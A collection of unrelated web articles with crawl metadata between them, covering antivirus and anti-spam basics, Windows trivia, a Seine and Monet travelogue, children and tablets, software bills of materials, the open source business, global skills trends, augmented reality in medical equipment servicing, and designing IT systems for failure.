As far as anti-spam products are concerned, it is important to note that they must be able to classify mails not only according to the source domain but also according to their content (with analysis of wording and keywords) and sender reputation. They should also be able to use typical anti-spam lists such as those provided by Spamhaus.org for classification purposes. In many cases, powerful spam filters can also be used to combat phishing emails.
Alternatively, client solutions for mail security are also available, which have often been integrated into anti-virus programs. These also take care of examining and securing incoming and outgoing messages, but directly on the respective client. Since they have to work on each workstation in the network, their administration is somewhat more complex than with centrally operating products. However, a central management console is usually available for such solutions.
Their use makes sense especially in environments where clients need to communicate with mail servers over whose security level corporate IT has no control, such as Gmail or similar services.
Now that we’ve arrived at the endpoints in the network, let’s take a look at typical client-based security solutions, namely antivirus programs. While it used to be standard advice for every security expert to have an antivirus program installed on every (Windows) client, opinions on this matter differ today.
There are several reasons for this: Firstly, antivirus programs must be able to scrutinize all the files on a computer and, ideally, all the memory on the device. This means that they inherently undermine the security concept of the operating system and thus open up attack areas that would not even exist without an anti-virus program.
For example, if an anti-virus tool running with the highest privileges has a security vulnerability and an attacker can exploit it to gain access to the system, then in most cases he will automatically have the highest privileges as well and, accordingly, will usually have the opportunity to do whatever he wants with the computer.
On the other hand, Windows Defender, Microsoft’s own anti-virus tool that has been included with Windows for a long time, has improved significantly in recent years. While Windows Defender initially performed poorly in tests by anti-virus specialists, with relatively weak detection rates that couldn’t keep up with other products on the market, this has changed significantly. Today, Windows Defender detects just as many viruses as other security solutions.
Does this mean that it still makes sense to use other antivirus solutions? Opponents of this move say that no company knows Windows better than Microsoft and that the number of employees in Microsoft’s security department is greater than the number of employees in most anti-virus software vendors in general. That is why, they say, Microsoft’s know-how is the best, and Windows Defender is preferable to all other products in this field.
The representatives of the other opinion say that Windows Defender, even if it is now as powerful as other solutions, becomes a risk simply because of the large number of installations. After all, many attackers design their malware to infect as large a number of computers as possible, and if they assume that Defender works as a security solution on most Windows computers, they will make sure that their malware can overcome Windows Defender if possible. The use of another antivirus program would help prevent the infection in such a case.
Another argument for the use of third-party solutions are additional functions, such as the previously mentioned client-based mail security or anti-spam functions. If these are needed in the company, administrators must switch to a product that meets all the requirements available in each case. So, the bottom line is that the final course of action depends on the preferences of the decision-makers and the requirements of the particular environment.
To comprehensively secure a network, there are many decisions to make and many configuration steps to perform. This article could only provide a brief overview of the most important steps. In most environments, further actions will be required, such as setting up secure remote access for mobile workers and home offices via VPN connections. In the next parts of this series, we will go into more detail about the network security requirements of specific industries. | <urn:uuid:fc6e8fa6-10d8-4591-b1ca-21d127f93a3d> | CC-MAIN-2022-40 | https://informationsecurityasia.com/network-security-basics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00786.warc.gz | en | 0.955263 | 1,925 | 2.5625 | 3 |
3 weird facts about Microsoft Windows
Here are 3 weird facts about Windows, that nobody can explain:
1. Nobody can create a folder named "Con".
Try to create anywhere on your hard disk a folder called "Con" (without the quotes). Go to a location on your hard disk, right click, choose "New" and then select "Folder" from the menu that appears. Name the folder "Con" (without quotes) and hit Enter. You?ll see that the folder won?t be named "Con". It will be "New folder"
2. A text file made with Notepad, with the following content : "Bush hid the facts" (without quotes) won?t display the actual text.
Go to Start -> Programs -> Accessories -> Notepad . Write in Notepad the following text : "Bush hid the facts" (without quotes) then Save the file and exit Notepad. Now go to the text file you created and open it. You?ll see that the text you just wrote and save won?t show.
3. Write in Word this : "=rand(200,99)" (without the quotes) and witness the magic.
Open Microsoft Word and on the first line write : "=rand(200,99)" (without the quotes) and hit Enter key. See the magic. | <urn:uuid:0b3583fc-79e1-4b69-a943-593ca9a0e863> | CC-MAIN-2022-40 | https://www.knowledgepublisher.com/article/615/3-weird-facts-about-microsoft-windows.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00186.warc.gz | en | 0.893269 | 277 | 2.859375 | 3 |
The Seine River
The Seine river rises about thirty kilometres
northwest of Dijon and passes through Paris
on its 777-kilometre journey to the sea.
Paris was founded on Île de la Cité, a small
island in the Seine, and now has grown to the point that
there are 37 bridges over the Seine within the city proper.
As this map shows, the Seine's course is serpentine
between Paris and the sea.
The Seine is navigable by ocean-going ships as far upstream as Rouen, 120 kilometres from its mouth at Le Havre. Periodic dredging keeps it open for large ships. The river only drops 24 meters over its last 446 kilometres, so its usual slow flow helps to keep it navigable. Atlantic salmon returned to the Seine in 2009, migrating upstream past Paris. Industrial and agricultural pollution plus the dams had driven salmon out of the Seine some time between the two World Wars. But now you can again catch salmon from the riverbank in Paris!
Smaller commercial barges can go as far beyond Paris as Burgundy. With the modern dams and locks, the Seine has an average depth of about 9.5 metres where it passes through Paris today. The dams and locks start above Rouen, you can see one when this travelogue reaches Rolleboise.
William the Conqueror became Duke of Normandy in 1035, and led the Norman Conquest of England in 1066. His forces were victorious at the Battle of Hastings on 14 October 1066, and he was crowned the first Norman King of England on Christmas day in 1066.
William returned to Normandy around the end of 1086, and soon set up a marriage of his daughter to the Duke of Brittany in order to get more allies against the King of France in Paris. William led an expedition to the area of Mantes in July 1087, to take a little more territory including the town of Mantes. William either became ill or was injured during the fighting, it's not clear just what happened to him. He was taken back to Rouen where he died on 9 September 1087.
This map shows William's area of control in 1087 in pink. These pages start with the first loop just outside the Normandy line, by the letter "n" in "Seine".
Mantes-la-Jolie is a commune or community of about 42,000 people. It used to be a large settlement mid-way between the power centers of the Kings of France in Paris and the Dukes of Normandy, originally actual Normans or Norsemen, at Rouen. Now it is more or less a far outer suburb of Paris.
It has been known officially as Mantes-sur-Seine, then in 1930 it merged with the commune of Gassicourt and was called Mantes-Gassicourt, and then in 1953 it was renamed as Mantes-la-Jolie. Informally, and less confusingly, it's just Mantes.
Let's zoom in, using the below map from 1951-1953 from the Perry-Castañeda Map Collection at the University of Texas at Austin. Mantes is at the bottom edge, it was still officially Mantes-Gassicourt when this map was published. We will go around that first loop below Mantes, through Rolleboise, Mousseseaux-sur-Seine, Lavacourt, and Vétheuil, where Claude Monet lived from the summer of 1878 until 1883.
In April 1883, Monet was riding a train between Vernon and Gasny and noticed Giverny. He moved there the following month, and lived there until his death in 1926.
Then we will continue to Haute-Isle and La Roche-Guyon. From there, we will continue down the north or right bank of the Seine to Les Andelys and Château Gaillard. We will end up in Rouen, where Monet worked in 1892 and 1893 on a series of paintings of the Rouen Cathedral in varying lighting at different times of the day and year.
So as we go downstream, we will be following Monet's painting projects in time order.
Let's get started. You can look at these in any order, but I suggest reading downstream. Start on the first loop of the Seine. | <urn:uuid:39d2bda0-1398-4eec-abf4-b5d2319b2e26> | CC-MAIN-2022-40 | https://cromwell-intl.com/travel/france/seine-river-art-history-monet/Index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00186.warc.gz | en | 0.959817 | 918 | 3.09375 | 3 |
With the wide array of electronic devices available in our everyday lives, it appears that children have formed an attachment to a different kind of toy.
According to the latest survey, 77 per cent of polled US, UK parents believe that iPads and other tablets are good educational tools that boost kids' creativity.
Meanwhile, researchers in this field explain that it is a matter of balance - and a child's access to tablets and other similar electronic devices should be monitored.
Specialists warn that using tablets in excess could cause attention deficit disorder and even autism, particularly at a very young age.
Parents should be aware of the first signs of trouble when they cannot remove their kid from their beloved iPad. Beside losing their favourite toy, the child could display some pretty serious symptoms.
Lisa Guernsey, author of "Screen Time: How Electronic Media -- From Baby Videos to Educational Software -- Affects Your Young Child," suggests that parents should notice the children's behaviour: "Can they focus on a conversation, not look a screen for 30 minutes?"
If the iPad becomes the electronic babysitter, researchers in child development point out that the balance could be lost - regardless of the device's benefits.
Source: NY DailyNews (opens in new tab) | <urn:uuid:5035dca3-19d6-4679-816a-9fe213dbec51> | CC-MAIN-2022-40 | https://www.itproportal.com/2012/04/03/many-parents-think-the-ipad-is-beneficial-for-children/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00186.warc.gz | en | 0.933315 | 252 | 2.984375 | 3 |
With the mass adoption of open source software in recent years, there has been an increasing tendency to include it as dependencies. This means that software systems use open source components for reusability and reliability reasons. However, the things that are easy to include are equally difficult to try to track, and things can get out of hand if there is no control or policy for including them.
This is why some skeptics wonder if there is a more effective way to leverage this power and convenience without causing more problems in the long run. There should be a way to record all of the parts that are required to compile, host, and run all of the software components of the infrastructure. We call this list a “bill of materials,” and this article will be devoted to explaining how it helps us address the risks of trusting external code.
The term “bill of materials” (or BOM) is taken from industrial manufacturing. It is a list of raw materials or assembly parts along with the quantities of each item that are needed to manufacture a complete component. You can think of it as the list of ingredients.
The BOM is vital because it serves as a verification document and helps ensure that all of the necessary parts are present and available in the proper quantities. If one part is missing, for example, or if the manufacturer was delayed in delivering the part, then there would be a flag in that BOM showing the issue with that particular part. Here is an example of a BOM file:
We can extend the analogy of the automotive recall to the software industry. This is what we call the Software Bill of Materials (sBOM), and it lists packages and library components. For example, you may have a node.js project where the node_modules folder contains all of the required packages that are used for building and running the application. If some of them turn out to demonstrate vulnerabilities or malicious code that was somehow injected via the registry, then your software pipeline is at risk.
The sBOM should list all packages used by all software components, their versions, their license models, a virus scanner report, and when they were last updated. Each package is traceable to the list of components that are connected so that you can trace the affected components if there is a failed scan. You also want to be able to upgrade or replace them in case of depreciation or a CVE exposure.
A “parts list” is a list of packages and dependent libraries that your software services need in order to operate. If the programs import libraries from NPM, Maven Central, or any other registry, then you can count them as parts.
If you have complete knowledge of those parts and what is required to build or compile the applications in your organization, then you can mitigate a whole series of issues and risks involved in maintaining those programs.
For example, if a new vulnerability is issued, then you can check if you are affected by comparing the affected versions against your existing bill of materials. If you have matches, you can find out which systems are affected.
Another example would be discovering that a library or dependency has been removed from a registry for whatever reason (such as license changes, legislative requirements, or maintainer decision). In that case, you wouldn’t be able to use that component, and you would have to utilize a different version or consider a replacement. If you maintain an accurate BOM list, you might be able to find alternative parts or libraries that can be replaced. This would mean that you’d have a contingency plan attached to some critical BOM items just in case.
Ultimately, having a better view of the components that your software depends on will give you a clear view of your risks and the vulnerabilities of your components.
How can we figure out what should be on this parts list? If you ask the developers, they will likely show you the package-lock.json or the Gemfile.lock from their projects. However, these do not include other parts like hardware, OS modules, license types, or any other details.
You can either use automated tools to retrieve that information as part of the CI/CD process or as part of your regular scanning of repos, or you can use an external vendor to manage that for you. For example, to check if some licenses are business-friendly, you can use the js-green-licenses checker from Google:
$ npx js-green-licenses --local ./
This would show you unlicensed or unsuitable packages from a predefined list. However, it only works for npm projects, and it only checks open-source licenses.
If you want to cover all bases, you will have to find all of the tools that show the list of dependencies and include some sort of policy that they must publish their parts list before deploying to production. Once this part is configured, it will be considerably easier to enroll applications and record their bill of materials.
With the general adoption of open source technologies, businesses are taking on the additional risks of vulnerabilities, deprecated versions, and hostile license models.
Before you jump on the bandwagon of the latest sBOM trends, it's critical that you assess the current security posture of your organization and identify how this change would gain you more credibility and increase your customers’ confidence in your products.
Once your path is clear, it’s important to assess present standards and best practices for compiling the list. You should start by reviewing the ntia website material from top to bottom. When you have the requisite domain knowledge, you can make informed decisions about the appropriate strategy for your organization and establish some baseline policies.
You need to be on top of documenting and capturing any changes or updates; otherwise, if left to their own devices, people tend to ignore them. It’s difficult to know the best way to capture software bills of materials in advance, and since security standards change constantly, it’s incredibly difficult to establish a long-term solution.
Thankfully, there are companies like Checkmarx that can help you with that. By utilizing their SCA solution, you can scan and compile the list of materials for software components. You can check it out and request a free demo today.
Theo Despoudis is a Senior Software Engineer, a consultant and an experienced mentor. He has a keen interest in Open Source Architectures, Cloud Computing, best practices and functional programming. He occasionally blogs on several publishing platforms and enjoys creating projects from inspiration. Follow him on Twitter @nerdokto. He can be contacted via http://www.techway.io/. | <urn:uuid:dcc80384-e212-4875-ad6d-1ed50718a3f0> | CC-MAIN-2022-40 | https://checkmarx.com/blog/why-you-need-an-accurate-parts-list-for-your-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00186.warc.gz | en | 0.9424 | 1,351 | 2.625 | 3 |
The business of arranging millions or billions of zeros and ones in exactly the right order—also known as the business of software—has undergone many significant shifts over the history of computing, and we might be about to experience yet another.
In the early days of commercial computing, software was seen as a constituent of the hardware platform. You bought a computer from a manufacturer such as IBM, and the computer came fully installed with all the software you would need.
Independent software vendors—ISVs—existed during the mainframe era, but it was not until the minicomputer and client server era that ISVs became truly significant. Minicomputers manufactured by companies such as Digital and Data General ran their own operating system, but by the early 1980s were typically running application software created by an independent company such as Oracle. When IBM created the IBM PC in 1981, it outsourced the operating system to a small company called Microsoft. By the end of the century, organizations such as Oracle and Microsoft had revenues that dwarfed that of the hardware manufacturers and they had become some of the most valuable companies of all time.
As a business, software had some incredible advantages. The incremental cost of producing software is negligible: Once you have perfected a piece of software you can replicate it at virtually no cost. Software also has a fairly low barrier to entry: You don’t need a massive manufacturing plant to create a piece of software; a single programmer can create a billion-dollar software product on a $500 computer.
However, over the last 10 years the software business has become a lot tougher. There are many reasons, but in particular open source software has created a significant and persistent disruption for the ISV. The concept of open source software emerged in the early 1980s from Richard Stallman’s GNU initiative, which aimed to produce a free open source software version of UNIX (GNU is a recursive acronym: GNU’s Not UNIX). Linux emerged in the early 1990s under a GNU license, and by the mid-2000s Linux had become the most significant server-side operating system. Red Hat created a billion-dollar company providing services and distributions of Linux.
Many enterprises were reluctant to build their infrastructure around open source software, preferring the security of a commercial software vendor such as Oracle or Microsoft. However, the economic advantages of Open Source proved decisive and by now, Open source has become an acceptable—and sometimes even mandatory—ingredient in the modern enterprise application architecture.
Ironically, just as the acceptance of open source in the enterprise has finally become established, the enthusiasm for open source in the software industry and venture capital community is starting to wane.
The image of open source as developed by hip hackers in garages is far from accurate: Almost all open source is developed inside commercial software companies. For example, the open source databases MySQL, MongoDB and Cassandra are predominantly supported by the Oracle, MongoDB, and DataStax corporations. These companies invest in OSS in order to gain market share or competitive advantage. Often, the investment is backed by venture capital firms hoping to find another Red Hat—i.e., another billion-dollar OSS company.
Unfortunately, the billions of dollars invested in open source has not created another Red Hat. If there is no return on the open source investment, then eventually the investors will invest somewhere else. There is already significant scepticism around open source within the Venture Capital community, and a sense of fatigue within large companies struggling to establish Open Source business models.
Open source has powered an enormous amount of innovation and has literally changed our world—mostly for the better. However, programmers need to eat, and corporations need revenue. Unless a truly viable and repeatable open source business model emerges, I think we will see a decreasing investment in open source software going forward. | <urn:uuid:1d5254bf-0c7a-42f6-8119-5b4fbf6d8be1> | CC-MAIN-2022-40 | https://www.dbta.com/Editorial/Think-About-It/Open-Source-at-the-Crossroads-114681.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00387.warc.gz | en | 0.962842 | 781 | 3.0625 | 3 |
26 March 2019 | Written by: sonia.malik
Categorized: Business Development
Share this post:
This past week, Coursera released the inaugural issue of the Coursera Global Skills Index (GSI), an in-depth look at skill trends and performance around the world, made possible by the millions of learners who come to Coursera to learn and grow.
As the types of skills needed in the labor market change rapidly, individual workers will have to engage in life-long learning if they are to achieve fulfilling and rewarding careers. For companies, reskilling and upskilling strategies will be critical if they are to find the talent they need and to contribute to socially responsible approaches to the future of work. For policy-makers, reskilling and retraining the existing workforce are essential levers to fuel future economic growth, enhance societal resilience in the face of technological change and pave the way for future-ready education systems for the next generation of workers.
Macro trends like digital transformation and the decreasing shelf-life of skills are challenging organizations to play catch up as they try to hire and develop their people. This year, the number one focus for talent developers is to identify, assess, and close skills gaps and they are tackling the challenge head-on in a myriad of ways and reports such as this draw from an innovative data methodology to reveal rich skills insights.
Here are some of the key findings of the report:
- Two-thirds of the world’s population is falling behind in critical skills, including 90% of developing economies. Countries that rank in the lagging or emerging categories (the bottom two quartiles) in at least one domain make up 66% of the world’s population, indicating a critical need to upskill the global workforce. Many countries with developing economies — and with less to invest in education — see larger skill deficiencies, with 90% ranking in the lagging or emerging categories.
- Europe is the global skills leader. European countries make up over 80% of the cutting-edge category (top quartile globally) across Business, Technology, and Data Science. Finland, Switzerland, Austria, Sweden, Germany, Belgium, Norway, and the Netherlands are consistently cutting-edge in all three domains. This advanced skill level is likely a result of Europe’s heavy institutional investment in education via workforce development and public education initiatives.
- Asia Pacific, the Middle East and Africa, and Latin America have high skill inequality. Consistent with the vast economic and cultural diversity that characterizes each region, Asia Pacific, Middle East and Africa, and Latin America have the greatest within-region skill variance. Asia Pacific is at the extremes of the global Business rankings with New Zealand (#6) and Australia (#9) approaching the very top, while Pakistan (#57) and Bangladesh (#59) land near the bottom. In the Middle East and Africa, Israel is a leader in each of the three domains and #1 in Data Science, while Nigeria lags near the bottom of the rankings across domains, and is last in Data Science. In Latin America, Argentina’s #1 ranking in Technology is in stark contrast to Mexico’s (#43) and Colombia’s (#49) lower proficiencies in the field.
- The United States must upskill while minding regional differences. Although known as a business leader for innovation, the U.S. hovers around the middle of the global rankings and is not cutting-edge in any of the three domains. Within the U.S., skill proficiency is distributed non-uniformly while the West ranks ahead of other regions in Technology and Data Science, the Midwest shines in Business.
In addition to benchmarking countries, they also evaluated trending skills globally and skill proficiencies across 10 major industry verticals and the top 2 findings were:
- Demand for Technology and Data Science skills is growing, while demand Business skills is shrinking. Across the board, enrollment numbers highlight fast-growing demand for Technology and Data Science skills from individuals and companies alike. IBM has a very strong Data Science Professional Certificate course to help get started with those Data Science Skills
- Technology industry professionals lack strong business skills. Technology ranks 5th in Business out of the ten industries in our analysis. To help resolve this, IBM has announced a series of 5 FREE professional skills courses
The complete Coursera report can be downloaded here
Education and training systems need to keep pace with the new demands of labor markets that are continually challenged by technological disruption, demographic change, shifting business models and the evolving nature of work. This transformation needs to address both short term (35% of the skills demanded for jobs across industries will change by 2020) and long-term needs in an urgent but sustainable manner. Stay connected with IBM Training to see how YOU and your organization can stay ahead in this skills game.
Follow IBM Training on: | <urn:uuid:c532e069-4c6c-4709-9dff-aadcb3fe82f1> | CC-MAIN-2022-40 | https://www.ibm.com/blogs/ibm-training/new-global-skills-index-report/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00387.warc.gz | en | 0.923588 | 1,003 | 2.5625 | 3 |
What is augmented reality?
Augmented reality will provide the user with an interactive experience, where the object/device in the real world (user/device side) will be enhanced with the AR app-generated information. The basic features of AR are a combination of the real and virtual world, real-time interaction, and accurate 3D registration of virtual and real objects.
Augmented reality works by adding the digital content/image from a live camera and making the image look as real as the actual device around the user. Also, it will add sound effects or digital visual elements to the image that has to appear to the user.
Where can it be used?
Augmented reality technology can be applied in almost all fields like retail, marketing, education, healthcare, etc. AR technology can be applied within the medical field in numerous ways. One way would be to view the specific human body system as a highly detailed, 3D image that can help the medical students/professionals in their training. This can be achieved by just pointing the mobile camera onto the body system. As augmented reality technology matures, the usage of this technology has also grown in healthcare, ranging from patient care to medical equipment servicing/support.
In health care, AR technology can also be used in physical therapy, in-flight medical emergencies, pain management, digital impressions on dental work, testing medical devices, and so on.
AR in medical equipment servicing:
The servicing of medical equipment is challenging, as it needs to be addressed immediately and requires knowledgeable dedicated resources. Without AR, repairing or troubleshooting such machines was a lengthier process going back and forth among lab technicians, service persons, and product experts, which aggravates the inconvenience for the clinic or hospital team.
The medical equipment downtime should be reduced/avoided because it can even risk the life of patients who need immediate medical attention.
The advancement of AR technology and its use in servicing medical equipment reduces downtime and human intervention. Also, it helps to give the solution quickly. With the usage of AR, even the complex equipment with so many hardware/software components can be easily serviced, and issues can be resolved remotely with the AR app installed on mobile.
How can an AR app be used in service?
Step 1: Identifying the problem/equipment
The service person will have an AR app installed on his mobile/tablet/google glass. With google glass, the technician will be hands-free to perform any action/repair work. When the technician sees the equipment with the glass/mobile, the camera will capture the equipment. With the image recognition technology, the device will be compared with the database content available on the AR app. This will help identify the model of the equipment or even the problem in it.
Step 2: Fetching relevant AR data
Now the app will access all the AR data (voiced guide, tips, scenario steps) relevant to the problem. With these tips, if the technician is confident, he can make a decision and resolve the issue by making adjustments.
Step 3: Augment in real-time
The image recognition algorithms used in the AR app will help to dynamically augment the live camera feed with text, videos, or 3D objects. This step will provide the technician with more possible solutions, with illustrations to guide him in resolving the issue. If the technician could not arrive at a solution, he can even contact the engineer/expert by using the video call option available in the app. This way, the expert can see the augmented content, which is made available to the service person, and he can suggest the solution immediately, which will reduce the service time considerably. It helps to reduce the downtime of the machine as well.
Additional features in AR app
Along with these options, an AR app can also have video communication to interact with engineers, service persons, and users. They can also have chat options to communicate among them. This feature can help the service person to guide the user more effectively.
The success of the AR-based equipment service depends mainly on AR content preparation. Even though the AR content preparation is a long-term and costly procedure, it will reduce the other costs like technical training, skilled professional recruitment, and also the travel time of the service person.
As Abraham Lincoln said, “If I had six hours to chop down a tree, I’d spend the first four hours sharpening the axe.” So the time/cost spent on content preparation will help with effective and continuous maintenance.
Implementation of this technology in medical equipment servicing will not affect the existing workflow and can be easily adaptable in the field, which will help gain a market for such apps. Even though one can argue on the time/cost spent on data collection, providing effective equipment service is more important for the growth of the business and to gain the trust of customers. So, we can see a bright future for service companies that adopt AR in servicing their devices. | <urn:uuid:b24c162b-61fd-4ca5-90f0-c90813c6ef94> | CC-MAIN-2022-40 | https://www.hcltech.com/blogs/augmented-reality-medical-equipment-servicing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00387.warc.gz | en | 0.940216 | 1,040 | 3.390625 | 3 |
More and more companies and organizations are starting to realize the amount of risks their physical faculties or information systems could face in today’s age of threats. System integration has a history of being adopted lately, although it is starting to become much more encompassing of a term. Usually, security system integration involves hooking up access control systems, CCTV systems, and alarm systems, but these days, we’re starting to incorporate more technologies into the arsenal. If you have heard of the term system integration, especially in the context of security technology, it is crucial to understand what the drawbacks and the benefits might be. Read on to learn more!
Improved Comprehensive Security
Integrated approaches can create a much-needed redundancy intended to increase the overall strength of an entire system in the event that one aspect of the security system is bypassed. If somebody were to duplicate the access control keycard, it might not be enough to get them into a secured parking lot if that lot is protected through a driver camera system. Any isolated system is subject to being entirely circumvented, but when it is combined together, it makes it a lot more challenging to bypass these security technologies. This is why system integration is so important.
Integrated systems also make spaces a lot more functional and more straightforward for those who should have full access. The benefit of these kinds of technologies is that they are usually designed around usability, instead of creating many mechanisms that a person has to be responsible for, like different keycards and passwords, they count on credentials that are essential to a user, like fingerprints, facial features, and knowledge to security questions. While keycards and passcodes might be utilized, developers of systems meant to be integrated are fully aware that carrying around various cards or remembering passwords is not efficient or practical.
Drawbacks and Difficulties
Looking back at time, a lot of security systems have been proprietary – or forcing you to buy each element of your system from the exact same vendor. However, this is changing vastly in recent years, as many suppliers in the physical security industry know all about the importance of open or standard systems for security technology.
Groundbreaking Technologies with Gatekeeper
Gatekeeper Security’s suite of intelligent optical technologies provides security personnel with the tool to detect today’s threats. Our systems help those in the energy, transportation, commercial, and government sectors protect their people and their valuables by detecting threats in time to act. From automatic under vehicle inspection systems, automatic license plate reader systems, to on the move automatic vehicle occupant identifier, we offer full 360-degree vehicle scanning to ensure any threat is found. Throughout 376 countries around the globe, Gatekeeper Security’s technology is trusted to help protect critical infrastructure. Follow us on Facebook and LinkedIn for updates about our technology and company. | <urn:uuid:dd75700f-f821-436b-bd72-35d6cd9c74d0> | CC-MAIN-2022-40 | https://www.gatekeepersecurity.com/blog/security-integration-concept-adopted-globally/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00587.warc.gz | en | 0.950435 | 572 | 2.5625 | 3 |
Define Security First
Given the amount of prose dedicated to the internet of things, it would hardly be foolish to assume that the term is well-defined and well-understood. In reality the opposite is true – professors, tech companies, the media, and individual blogs all disagree on what exactly falls under the umbrella of internet of things.
The problem seems to be that until recently, the internet of things was a relatively niche area. Its gadgets hadn’t yet become mainstream and ubiquitous, all-compassing connectivity was nothing but a glint in the eye of tech giants. However, today the term has become incredibly broad. It includes everything from Apple’s smart watch to city planning and from airport technology to health monitoring. It’s so broad that almost any internet-connected device can reasonably claim to be part of it.
The problem is comparable to that faced by cloud computing five years ago. At the time, the term ‘the cloud’ seemingly referred to everything stored online in some way – as if the entire cloud was one single model. As the market developed and matured, and the adoption of the cloud became increasingly widespread by personal and business users, a more refined set of terminology developed. Today it has been broken down into a number of subsets – for example, PaaS, SaaS, IaaS, etc.
As the internet of things sector matures and the industry develops, we will no longer be able to bundle all these very different things under one generic umbrella term. Much like ‘cloud’ or ‘big data’ in the past, it’s incredibly overused, and to some degree, almost too vague to be useful.
The answer appears to be rooted in security. As with the important distinctions in cloud computing – each which requires the business using the service to negotiate a different balance between trust and control with the cloud provider – a similar set of distinctions must now be made for the internet of things.
After all, it is a significant challenge to establish trust and control across an enormous range of ‘things’, particularly when they are widely distributed, deployed on a scale of millions, and handle highly sensitive data. The information flowing through a network of smart ovens is very different from the information generated by a installation of earthquake detectors. Therefore, it is impossible to discuss to define the internet of things effectively without first breaking it into parts. Failure to separate the IoT into differing levels of security will lead to trying to secure all data on all devices – an impossible task.
How or what those terms may be is a job for skilled professionals – the same professionals who secure nearly every website on the planet and the payment systems we use every day. The coming years should be a fascinating time.
By Daniel Price
Daniel is a Manchester-born UK native who has abandoned cold and wet Northern Europe and currently lives on the Caribbean coast of Mexico. A former Financial Consultant, he now balances his time between writing articles for several industry-leading tech (CloudTweaks.com & MakeUseOf.com), sports, and travel sites and looking after his three dogs. | <urn:uuid:c57b47f0-7e82-494c-b33d-74022c0556bd> | CC-MAIN-2022-40 | https://cloudtweaks.com/2014/11/define-security-first/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00587.warc.gz | en | 0.957691 | 644 | 2.8125 | 3 |
Failure is inevitable. When we assume that services must be up 100 percent of the time, that’s when IT teams run into issues. This is where designing to fail, or what InfoQ refers to as designing for resilience, plays a critical role.
Designing for failure means that your team has automated processes in place for when your system fails, in addition to having as much control as possible over how this failure occurs. A system designed for failure is more capable of self-healing, restarting and maintaining service when the worst happens.
By shifting our focus from designing systems to constantly achieve high uptime to instead designing our systems to fail in a predictable way, we can ensure quicker recovery and minimal downtime.
A design-to-fail blueprint
Organizations need more than just a disaster recovery plan. Systems that are designed to fail should self-recover as much as possible, regardless of the intimate domain knowledge required to execute disaster recovery plans. Furthermore, these plans often don’t account for how applications built on top of the cloud need to be designed to support all the elements of a service or application that can fail individually—hardware failures, OS or system failures, internet failures, BGP, peering issues, and other aspects that may be outside of your control.
An easy way to get started is to have a post-mortem pretending that you have just had a massive failure event. Which systems were impacted? How do these systems restart? What dependencies must be accounted for? Who was notified? What time did the event occur? What was the impact on our users? This requires a mindset shift and an ability to visualize your real-time and future states. Let’s look at 4 important elements of the “design to fail” approach to your systems.
1. Visualize your systems
IT teams shouldn’t just know how their systems look when uptime is 100 percent. They should also anticipate changes to the cloud environment brought about by downtime incidents. Visualization helps teams see real-time and future states with the appropriate context needed to plan for failure.
2. Understand your dependencies
During an incident, dependencies can also change. If essential tools experience downtime, IT teams must have a plan for how to move forward with minimal issues until those services are back online.
These teams need to develop an understanding of the types of data that persist in your system, where data persists, what the replication schemes are, what data durability requirements apply, and so on. By using visualization and documentation to know which dependencies apply, IT leaders can determine how an organization or team will respond if your system’s dependencies begin to fail. You can more easily build in redundancy among your dependent components so that no single point of failure can weaken or collapse your system.
3. Bring all stakeholders up to speed
Designing to fail requires a variety of stakeholders in the planning process, including IT leadership, cloud architects, application DevOps teams, and others. In addition, business leaders without a technical background are often looped in when large-scale failure incidents occur. CIOs and IT leaders need to determine who should be involved in the failure planning process and then ensure that these stakeholders have input, access and alignment.
Without effective collaboration, IT leaders run the risk of their teams struggling to catch up during an incident. Misinformed stakeholders can’t fully participate during an event or in the planning stages. Visuals, like incident management process flows, are a great way for leaders to communicate to broader internal and external audiences about the potential and actual implications of a downtime incident. In the context of designing to fail, the IT and infrastructure teams can role-play incident response from there and plan various scenarios while bringing all kinds of stakeholders up to the same level of understanding.
4. Consider low-risk resiliency strategies
Leveraging multi-region solutions is an important strategy for building enterprise-scale resiliency. One way to accomplish multi-region solutions is to leverage multiple cloud providers. AWS, Microsoft Azure, and Google Cloud all have solutions for multi-cloud and hybrid service options. IT leaders who are seeking greater resiliency for their organizations would be wise to consider new models and opportunities from these public cloud providers.
Designing for failure means striking the right balance that gives the organization control while also preparing for what very well could go wrong.
The cloud is designed to fail
Although our applications aren’t usually designed to fail, the cloud is. Ensuring high levels of cloud uptime requires safeguards, such as the ability to route traffic to different geographic regions. When failure does occur, the last thing a CIO or an organization wants is for failure to unfold without a guiding plan.
Retooling failure into a controlled fall returns agency in otherwise troubled situations. This principle is similar to one found in Aikido, a Japanese self-defense martial art. Aikido teaches practitioners how to fall properly—because everyone falls (and sometimes you’re pushed). By falling in the right way, you can roll back onto your feet and minimize injury in the process.
Applications should fall in a similar way. Careful planning, an intimate knowledge of cloud architecture, and design that understands and quickly responds to failure can bring organizations back to their feet again quickly so they can meet uptime requirements and keep customers happy.
How organizations recover from an incident makes a difference in minimizing damage, and these recovery plans can become even more effective and efficient when we approach failure as inevitable and plan for it accordingly. While this requires a massive paradigm shift across the industry, CIOs and IT leaders need to spend the time and resources today to proactively design their systems to fail, allowing organizations to have more effective failure plans in place and achieve the high uptime that keeps us all moving forward.
